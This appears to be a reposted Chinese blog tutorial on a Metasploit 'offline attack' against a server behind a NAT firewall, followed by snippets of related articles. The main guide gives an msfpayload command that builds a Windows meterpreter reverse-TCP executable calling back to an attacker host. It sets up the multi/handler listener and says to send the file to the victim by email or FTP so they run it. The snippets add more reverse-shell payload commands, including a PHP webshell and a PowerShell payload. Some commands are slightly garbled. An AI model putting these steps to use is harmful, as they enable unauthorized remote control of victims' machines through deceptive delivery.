MSF 离线攻击

最新推荐文章于 2024-08-16 20:51:47 发布
最新推荐文章于 2024-08-16 20:51:47 发布
阅读量414 收藏 1
点赞数 1
原文链接:http://www.cnblogs.com/networking/p/4100318.html
版权

MSF 离线攻击

 MSF连环攻击在internet上实现是不太现实的,网络中的安全设备(防火墙、入侵检测、入侵防护系统)。

实验拓扑如下:

 

实验说明:安全实验中的包过滤防火墙在测试中使用的是linux iptables,上述拓扑中,攻击者的公网地址为61.67.1.100/24,而防火墙上的公网地址61.67.1.200/24 对内部主机192.168.1.0/24 做SNAT。

Linux iptables 策略如下:

#bin/bash

Fw=/sbin/iptables

$fw –P INPUT DROP

$fw –P FORWARD ACCEPT
$fw –P OUTPUT ACCEPT

echo 1 >/proc/sys/net/ipv4/ip_forward

$FW -t nat -A POSTROUTING -o em1 -s 192.168.1.0/24 -j SNAT -to 61.67.1.200

Iptables-save

此时攻击者就无法主动发起TCP建立请求和位于防火墙后的服务器192.168.1.100/24建立连接,MSF连环攻击也就无法实现。因而在这种环境中需要使用MSF的离线攻击。

实现MSF离线攻击的步骤如下:

1、  生成离线攻击脚本

#cd  /pentest/exploits/frameworks3

/pentest/exploits/frameworks3# ./msfpayload  windows/meterpreter/reverse_tcp LHOST=10.0.0.3 LPORT=38438  X>/home/soft/msf38438.exe

说明:生成反向tcp连接脚本 服务器的IP为10.0.0.3 服务器使用的TCP端口为38438 生成的脚本存放的路径为/home/soft,文件名为 msf38438.exe

 

2、  创建TCP反向连接服务

#msfconsole

msf>use exploit/multi/handler

msf exploit(handler)>set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler)>set LHOST 10.0.0.3

msf exploit(handler)>set PORT 38438

 

3、 启动服务

 

4、  将生成的离线攻击包通过其他手段(邮件、FTP)等传送到受害者服务器,如下:

 

只要受害者服务器上该程序被执行即可。

5、  在攻击者的服务器端查看连接

 

6、  查看是否获取系统控制权

 

转载于:https://www.cnblogs.com/networking/p/4100318.html

msf生成webshell攻击服务器
afei001
03-22 1060
实验环境 攻击机:kali   IP:192.168.3.157 靶机:win 10(已搭建WAMP) 生成Webshell攻击服务器 1.在kali上生成Webshell Payload root@afei:~# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.3.157 lport=5555 -f raw > shel...
Kali密码攻击之——离线攻击工具
TK_Share的博客
06-12 1968
在线密码攻击在渗透测试中很重要,但对于测试过程中得到的哈希,加密数据,又需要离线破解工具辅助解决 Creddump套件 kali下离线攻击工具中的Cache-dump,lsadump,pwdump,均为creddump套件,的一部分 Chntpw 用来修改Windows SAM文件实现系统密码修改,亦可在kali作为启动盘时做删除密码的用途 这里有一个该工具使用的链接http://blog.csdn.net/pyufftj/article/details/20387189 Crunch 实用的密码字典生
Kali密码攻击离线攻击工具(一)
miao_9的博客
04-09 3134
Kali密码攻击离线攻击工具(一)在线密码攻击在渗透测试中很重要,但对于测试过程中得到的哈希,加密数据,又需要离线破解工具辅助解决。1 Creddump套件Kali Linux下离线攻击工具中的Cache-dump、lsadump与pwdump均为creddump套件的一部分,基于python的哈希抓取工具,项目地址:http://code.google.com/p/creddump/source
msf攻击Mysql服务.docx
04-26
本文详细介绍了通过msf对MySQL服务器进行攻击的过程,文中列出了每一个步骤,并详细列出了使用的命令。
Metasploit漏洞利用系列(三):MSF渗透测试实战——网络服务器攻击渗透
2402_86373248的博客
08-16 640
本文将围绕一个典型场景——利用MS17-010漏洞对Windows服务器进行渗透测试,以展示Metasploit的强大功能和渗透测试的实际操作步骤。通过本次实战,我们不仅展示了Metasploit在渗透测试中的强大能力,同时也提醒所有系统管理员及时更新系统和打补丁的重要性。记住,合法的渗透测试应当在授权和法律允许的范围内进行,旨在帮助提升网络安全,而非非法入侵。后续行动建议:在完成渗透测试后,撰写详细的报告,总结发现的安全漏洞,并提出相应的修补建议,帮助客户加强网络安全防护体系。命令检查目标是否易受攻击
kali-linux 工具Metasploit离线攻击使用教程
12-29
本教程将聚焦于Metasploit的离线攻击使用方法,这对于那些在没有互联网连接或者需要保持匿名状态的环境中工作的安全专家尤其重要。 Metasploit框架是一个开源项目,它提供了大量的攻击模块,涵盖了网络扫描、漏洞...
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~)
weixin_46238756的博客
11-01 2056
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~) 文末赠送超级干货哈 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上执行有限命令
生命在于学习——MSF初体验(三)
易水哲的博客
10-27 1692
MSF的笔记记录(三)
MSF后渗透
wo41ge的博客
11-24 3921
信息收集 获取目标机器的分区情况: post/windwos/gather/forensics/enum_drives 判断是否为虚拟机 post/windows/gather/checkvm 开启了哪些服务 :post/windwos/gather/enum_services 安装了哪些应用: post/windows/gather/enum_applications 查看共享: post/windows/gather/enum_shares 获取主机最近的系统操作: post/windows/gathe
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)
渗透、攻防、CTF、编程
10-12 3578
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境) 0x01 知识点 MSF工具的利用,ms17-010漏洞实验 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.129) 目标机:win7(ip:192.168.233.130) 0x03 实验准备 启动msf,输入msfconsole 检错漏洞库,输入search ms ,盐城msf库里存在ms17-010漏洞 3、nmap检测目标机开放端口 nmap –..
利用公网Msf+MS17010跨网段攻击内网(不详细立马关站)
热门推荐
大方子
08-24 1万+
前言 其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。 准备工作 1.安装了Msf的公网主机+Ubuntu系统 2.一台其他服务器内网存在445漏洞 3.细心,细心,细心,钻研,钻研!!!...
msf web_delivery模块攻击实战操作
欢迎来到神林的博客
04-14 2757
1.打开神器metasploit,终端输入msfconsole(我建议直接图形界面单击打开,方便啊)2.搜索web_delivery模块:search web_delivery3.使用命令:use exploit/multi/script/web_delivery4.设置攻击机Ip:set lhost (这里是你自己的ip)5.运行,exploit,生成:payload:   python -c ...
Powershell 配合msf无文件攻击
洋洋的小黑屋
04-27 1810
生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1121 -f psh-reflection >x.ps1 放到VPS上,这里我们放到本机搭建的apache环境中 kali设置监听,并且启动 win7中访问木马是否成功 直接在win7的cmd中执行命令 powersh...
“无文件”攻击方式渗透实验
weixin_33972649的博客
03-16 490
拓扑设计   拓扑介绍 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.168.1.110,和内网的172.21.132.110),而且为了最基本的安全保障,web边界服务器设置了防火墙,此防火墙对外网只开放80,81,443端口,对内网开放所有端口,上面还装有杀毒软件。 内网还布置若干台web服...
Metasploit(MSF)渗透测试入门
2301_77147728的博客
03-29 1048
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程1、Auxiliary(辅助模块)为渗透测试信息搜集提供了大量的辅助模块支持2、Exploits(攻击模块)利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。3、Payload(攻击载荷模块)攻击成功后促使靶机运行的一段植入代码4、Post (后渗透攻击模块)收集更多信息或进一步访问被利用的目标系统5、Encoders(编码模块)
bt5 note [5] msf运用层攻击
www.i201314.net
07-10 956
MSF 图形话界面:armitage 一、连环攻击       hosts (代替了db_hosts)  (上次扫描的结果放入数据库,可以直接hosts -h查看更多选项)       hosts -d (db_del_host 192.168.1.104 )  (清空数据库)       services(代替了 db_services) (查看数据库服务)      db_nma
msf攻击载荷生成器
我还在的博客
10-06 1731
msf攻击载荷生成器0x00 前言0x01 拓扑结构0x02 过程1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成器生成木马过程 0x00 前言 这是我对 msf攻击载荷生成器的学习记录。 0x01 拓扑结构 0x02 过程 1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成器生成木马过程 1.1 显示msfpayload命令的使用方法:msfp...
经典攻击示范--离线攻击--HASH值传递
辉小鱼的博客
07-03 178
即使我们不知道目标系统存在哪些漏洞,如果我们能够将攻击载荷放在目标系统中,也是能够获取目标系统的权限的。*在这里使用简单的方法,Kali启用HTTP服务器,Windows 7通过网页访问Kali下载木马文件。*在哪个目录下启用HTTP服务,该目录就为分享文件的根目录。是净荷生成和编码的组合,它在2015年6月8日取代了。*选择不同的编码方式用于逃避AV的检查。Msfvenom 查看Payload。msf已经监听并建立到目标系统的连接。Msfvenom查看输出格式。Msfvenom编码。
kali linux入侵win7
最新发布
12-26
### 使用Kali Linux对Windows 7进行渗透测试 #### 渗透测试概述 Kali Linux是一个专门为渗透测试设计的操作系统,内置了大量的安全工具[^1]。对于针对Windows 7系统的渗透测试而言,可以从网络信息收集、漏洞发现以及利用等多个阶段展开。 #### 工具介绍 - **Nmap**: Nmap是一款强大的端口扫描器,能够帮助识别目标机器开放的服务及其版本信息。这有助于了解哪些服务可能存在已知的安全弱点。 - **Metasploit Framework (MSF)**: Metasploit是世界上最著名的开源安全漏洞检测平台之一,提供了丰富的模块库用于攻击向量的选择和定制化载荷生成。例如`msfvenom`可用于创建恶意程序并设置反向连接参数以便后续控制受害设备[^4]。 - **Hydra/John The Ripper**: 当涉及到暴力破解远程登录认证机制时,这两个工具非常有用;前者专注于在线猜解账户密码组合而后者则更擅长离线字典攻击加密后的散列值。 - **Wireshark/Aircrack-ng Suite**: 如果计划实施中间人攻击或者分析无线通信流量,则上述两款应用程序不可或缺——它们允许捕获并解析几乎任何类型的协议报文甚至尝试恢复WPA/WEP密钥。 #### 测试流程示例 假设已经获得了合法授权来进行此次评估活动: 1. 利用Nmap进行全面的TCP SYN扫描(`nmap -sS`)以确定存活主机列表及对应开放端口情况; 2. 基于第一步的结果挑选出可能存在问题的应用层协议(如HTTP, FTP等),再借助特定插件进一步挖掘潜在风险点; 3. 针对确认存在缺陷的地方编写相应的exploit脚本并通过Metasploit加载执行,成功后获得meterpreter session从而实现对内部资源一定程度上的操控权限; 4. 探索其他可被利用的身份验证接口比如RDP(远程桌面),采用合适的手段绕过其防护措施直至完全接管整个环境为止。 请注意以上过程仅作为教学用途展示,并不鼓励非法入侵行为! ```bash # 执行快速全网段探测 sudo nmap -sn 192.168.x.0/24 # 对指定IP做深入服务指纹识别 sudo nmap -O -v target_ip_address # 启动metasploit console准备下一步动作 msfconsole ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值